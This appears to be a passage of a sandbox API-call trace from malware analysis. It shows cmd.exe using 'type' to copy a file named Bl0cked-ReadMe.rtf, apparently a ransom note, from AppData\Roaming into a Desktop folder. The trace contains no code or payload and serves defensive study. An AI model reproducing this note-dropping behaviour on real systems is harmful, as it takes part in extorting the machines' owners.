[0224.695] _get_osfhandle (_FileHandle=1) returned 0x7 [0224.695] _get_osfhandle (_FileHandle=1) returned 0x7 [0224.695] _get_osfhandle (_FileHandle=1) returned 0x7 [0224.695] GetFileType (hFile=0x7) returned 0x2 [0224.696] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0224.696] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18fb78 | out: lpMode=0x18fb78) returned 1 [0224.696] _dup (_FileHandle=1) returned 3 [0224.696] _close (_FileHandle=1) returned 0 [0224.696] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0224.696] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\fttfht~1\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x18fb48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0224.696] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0224.696] GetConsoleTitleW (in: lpConsoleTitle=0x18f978, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0224.697] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0224.697] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0224.697] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0224.697] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0224.697] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e25260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0224.698] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x18f4dc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f4dc) returned 0x230e88 [0224.698] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0224.698] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0224.698] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0224.698] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18e3e8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0224.698] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0224.699] _get_osfhandle (_FileHandle=4) returned 0x54 [0224.699] GetFileType (hFile=0x54) returned 0x1 [0224.699] _get_osfhandle (_FileHandle=4) returned 0x54 [0224.699] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x18e440 | out: lpFileSizeHigh=0x18e440*=0x0) returned 0x1632 [0224.699] _get_osfhandle (_FileHandle=4) returned 0x54 [0224.699] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0224.699] _get_osfhandle (_FileHandle=4) returned 0x54 [0224.699] ReadFile (in: hFile=0x54, lpBuffer=0x18f278, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e468, lpOverlapped=0x0 | out: lpBuffer=0x18f278*, lpNumberOfBytesRead=0x18e468*=0x200, lpOverlapped=0x0) returned 1 [0224.700] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.700] GetFileType (hFile=0x4c) returned 0x1 [0224.700] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.700] GetFileType (hFile=0x4c) returned 0x1 [0224.700] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.700] WriteFile (in: hFile=0x4c, lpBuffer=0x18f278*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f278*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.701] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.701] GetFileType (hFile=0x4c) returned 0x1 [0224.701] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.701] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f2c8*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.701] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.701] GetFileType (hFile=0x4c) returned 0x1 [0224.701] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.701] WriteFile (in: hFile=0x4c, lpBuffer=0x18f318*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f318*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.701] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.702] GetFileType (hFile=0x4c) returned 0x1 [0224.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.702] WriteFile (in: hFile=0x4c, lpBuffer=0x18f368*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f368*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.702] GetFileType (hFile=0x4c) returned 0x1 [0224.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.702] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f3b8*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.702] GetFileType (hFile=0x4c) returned 0x1 [0224.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.702] WriteFile (in: hFile=0x4c, lpBuffer=0x18f408*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f408*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.702] GetFileType (hFile=0x4c) returned 0x1 [0224.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.702] WriteFile (in: hFile=0x4c, lpBuffer=0x18f458*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f458*, lpNumberOfBytesWritten=0x18e45c*=0x20, lpOverlapped=0x0) returned 1 [0224.702] _get_osfhandle (_FileHandle=4) returned 0x54 [0224.702] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e448 | out: lpNewFilePointer=0x0) returned 1 [0224.702] _get_osfhandle (_FileHandle=4) returned 0x54 [0224.702] ReadFile (in: hFile=0x54, lpBuffer=0x18f278, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e468, lpOverlapped=0x0 | out: lpBuffer=0x18f278*, lpNumberOfBytesRead=0x18e468*=0x200, lpOverlapped=0x0) returned 1 [0224.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.702] GetFileType (hFile=0x4c) returned 0x1 [0224.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.702] GetFileType (hFile=0x4c) returned 0x1 [0224.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.702] WriteFile (in: hFile=0x4c, lpBuffer=0x18f278*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f278*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.702] GetFileType (hFile=0x4c) returned 0x1 [0224.702] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.702] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f2c8*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.703] GetFileType (hFile=0x4c) returned 0x1 [0224.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.703] WriteFile (in: hFile=0x4c, lpBuffer=0x18f318*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f318*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.703] GetFileType (hFile=0x4c) returned 0x1 [0224.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.703] WriteFile (in: hFile=0x4c, lpBuffer=0x18f368*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f368*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.703] GetFileType (hFile=0x4c) returned 0x1 [0224.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.703] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f3b8*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.703] GetFileType (hFile=0x4c) returned 0x1 [0224.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.703] WriteFile (in: hFile=0x4c, lpBuffer=0x18f408*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f408*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.703] GetFileType (hFile=0x4c) returned 0x1 [0224.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.703] WriteFile (in: hFile=0x4c, lpBuffer=0x18f458*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f458*, lpNumberOfBytesWritten=0x18e45c*=0x20, lpOverlapped=0x0) returned 1 [0224.703] _get_osfhandle (_FileHandle=4) returned 0x54 [0224.703] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e448 | out: lpNewFilePointer=0x0) returned 1 [0224.703] _get_osfhandle (_FileHandle=4) returned 0x54 [0224.703] ReadFile (in: hFile=0x54, lpBuffer=0x18f278, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e468, lpOverlapped=0x0 | out: lpBuffer=0x18f278*, lpNumberOfBytesRead=0x18e468*=0x200, lpOverlapped=0x0) returned 1 [0224.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.703] GetFileType (hFile=0x4c) returned 0x1 [0224.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.703] GetFileType (hFile=0x4c) returned 0x1 [0224.703] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.703] WriteFile (in: hFile=0x4c, lpBuffer=0x18f278*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f278*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.704] GetFileType (hFile=0x4c) returned 0x1 [0224.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.704] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f2c8*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.704] GetFileType (hFile=0x4c) returned 0x1 [0224.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.704] WriteFile (in: hFile=0x4c, lpBuffer=0x18f318*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f318*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.704] GetFileType (hFile=0x4c) returned 0x1 [0224.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.704] WriteFile (in: hFile=0x4c, lpBuffer=0x18f368*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f368*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.704] GetFileType (hFile=0x4c) returned 0x1 [0224.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.704] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f3b8*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.704] GetFileType (hFile=0x4c) returned 0x1 [0224.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.704] WriteFile (in: hFile=0x4c, lpBuffer=0x18f408*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f408*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.704] GetFileType (hFile=0x4c) returned 0x1 [0224.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.704] WriteFile (in: hFile=0x4c, lpBuffer=0x18f458*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f458*, lpNumberOfBytesWritten=0x18e45c*=0x20, lpOverlapped=0x0) returned 1 [0224.704] _get_osfhandle (_FileHandle=4) returned 0x54 [0224.704] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e448 | out: lpNewFilePointer=0x0) returned 1 [0224.704] _get_osfhandle (_FileHandle=4) returned 0x54 [0224.704] ReadFile (in: hFile=0x54, lpBuffer=0x18f278, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e468, lpOverlapped=0x0 | out: lpBuffer=0x18f278*, lpNumberOfBytesRead=0x18e468*=0x200, lpOverlapped=0x0) returned 1 [0224.704] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.705] GetFileType (hFile=0x4c) returned 0x1 [0224.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.705] GetFileType (hFile=0x4c) returned 0x1 [0224.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.705] WriteFile (in: hFile=0x4c, lpBuffer=0x18f278*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f278*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.705] GetFileType (hFile=0x4c) returned 0x1 [0224.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.705] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f2c8*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.705] GetFileType (hFile=0x4c) returned 0x1 [0224.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.705] WriteFile (in: hFile=0x4c, lpBuffer=0x18f318*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f318*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.705] GetFileType (hFile=0x4c) returned 0x1 [0224.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.705] WriteFile (in: hFile=0x4c, lpBuffer=0x18f368*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f368*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.705] GetFileType (hFile=0x4c) returned 0x1 [0224.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.705] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f3b8*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.705] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.706] GetFileType (hFile=0x4c) returned 0x1 [0224.706] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.706] WriteFile (in: hFile=0x4c, lpBuffer=0x18f408*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f408*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.706] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.706] GetFileType (hFile=0x4c) returned 0x1 [0224.706] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.706] WriteFile (in: hFile=0x4c, lpBuffer=0x18f458*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f458*, lpNumberOfBytesWritten=0x18e45c*=0x20, lpOverlapped=0x0) returned 1 [0224.706] _get_osfhandle (_FileHandle=4) returned 0x54 [0224.706] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e448 | out: lpNewFilePointer=0x0) returned 1 [0224.706] _get_osfhandle (_FileHandle=4) returned 0x54 [0224.706] ReadFile (in: hFile=0x54, lpBuffer=0x18f278, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e468, lpOverlapped=0x0 | out: lpBuffer=0x18f278*, lpNumberOfBytesRead=0x18e468*=0x200, lpOverlapped=0x0) returned 1 [0224.706] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.706] GetFileType (hFile=0x4c) returned 0x1 [0224.706] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.706] GetFileType (hFile=0x4c) returned 0x1 [0224.706] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.706] WriteFile (in: hFile=0x4c, lpBuffer=0x18f278*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f278*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.706] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.706] GetFileType (hFile=0x4c) returned 0x1 [0224.706] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.706] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f2c8*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.706] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.706] GetFileType (hFile=0x4c) returned 0x1 [0224.706] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.706] WriteFile (in: hFile=0x4c, lpBuffer=0x18f318*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f318*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.706] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.706] GetFileType (hFile=0x4c) returned 0x1 [0224.706] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.706] WriteFile (in: hFile=0x4c, lpBuffer=0x18f368*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f368*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.706] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.707] GetFileType (hFile=0x4c) returned 0x1 [0224.707] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.707] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f3b8*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.707] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.707] GetFileType (hFile=0x4c) returned 0x1 [0224.707] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.707] WriteFile (in: hFile=0x4c, lpBuffer=0x18f408*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f408*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.707] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.707] GetFileType (hFile=0x4c) returned 0x1 [0224.707] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.707] WriteFile (in: hFile=0x4c, lpBuffer=0x18f458*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f458*, lpNumberOfBytesWritten=0x18e45c*=0x20, lpOverlapped=0x0) returned 1 [0224.707] _get_osfhandle (_FileHandle=4) returned 0x54 [0224.707] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e448 | out: lpNewFilePointer=0x0) returned 1 [0224.707] _get_osfhandle (_FileHandle=4) returned 0x54 [0224.707] ReadFile (in: hFile=0x54, lpBuffer=0x18f278, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e468, lpOverlapped=0x0 | out: lpBuffer=0x18f278*, lpNumberOfBytesRead=0x18e468*=0x200, lpOverlapped=0x0) returned 1 [0224.707] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.707] GetFileType (hFile=0x4c) returned 0x1 [0224.707] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.707] GetFileType (hFile=0x4c) returned 0x1 [0224.707] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.707] WriteFile (in: hFile=0x4c, lpBuffer=0x18f278*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f278*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.707] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.707] GetFileType (hFile=0x4c) returned 0x1 [0224.707] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.707] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f2c8*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.707] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.707] GetFileType (hFile=0x4c) returned 0x1 [0224.707] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.707] WriteFile (in: hFile=0x4c, lpBuffer=0x18f318*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f318*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.707] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.707] GetFileType (hFile=0x4c) returned 0x1 [0224.708] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.708] WriteFile (in: hFile=0x4c, lpBuffer=0x18f368*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f368*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.708] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.708] GetFileType (hFile=0x4c) returned 0x1 [0224.708] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.708] WriteFile (in: hFile=0x4c, lpBuffer=0x18f3b8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f3b8*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.708] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.708] GetFileType (hFile=0x4c) returned 0x1 [0224.708] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.708] WriteFile (in: hFile=0x4c, lpBuffer=0x18f408*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f408*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.708] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.708] GetFileType (hFile=0x4c) returned 0x1 [0224.708] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.708] WriteFile (in: hFile=0x4c, lpBuffer=0x18f458*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f458*, lpNumberOfBytesWritten=0x18e45c*=0x20, lpOverlapped=0x0) returned 1 [0224.708] _get_osfhandle (_FileHandle=4) returned 0x54 [0224.708] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e448 | out: lpNewFilePointer=0x0) returned 1 [0224.708] _get_osfhandle (_FileHandle=4) returned 0x54 [0224.708] ReadFile (in: hFile=0x54, lpBuffer=0x18f278, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e468, lpOverlapped=0x0 | out: lpBuffer=0x18f278*, lpNumberOfBytesRead=0x18e468*=0x200, lpOverlapped=0x0) returned 1 [0224.708] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.708] GetFileType (hFile=0x4c) returned 0x1 [0224.708] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.708] GetFileType (hFile=0x4c) returned 0x1 [0224.708] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.708] WriteFile (in: hFile=0x4c, lpBuffer=0x18f278*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f278*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.708] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.708] GetFileType (hFile=0x4c) returned 0x1 [0224.708] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.708] WriteFile (in: hFile=0x4c, lpBuffer=0x18f2c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f2c8*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.708] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.709] GetFileType (hFile=0x4c) returned 0x1 [0224.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.709] WriteFile (in: hFile=0x4c, lpBuffer=0x18f318*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e45c, lpOverlapped=0x0 | out: lpBuffer=0x18f318*, lpNumberOfBytesWritten=0x18e45c*=0x50, lpOverlapped=0x0) returned 1 [0224.709] _get_osfhandle (_FileHandle=1) returned 0x4c [0224.709] GetFileType (hFile=0x4c) returned 0x1 [0224.709] _get_osfhandle (_FileHandle=1) returned 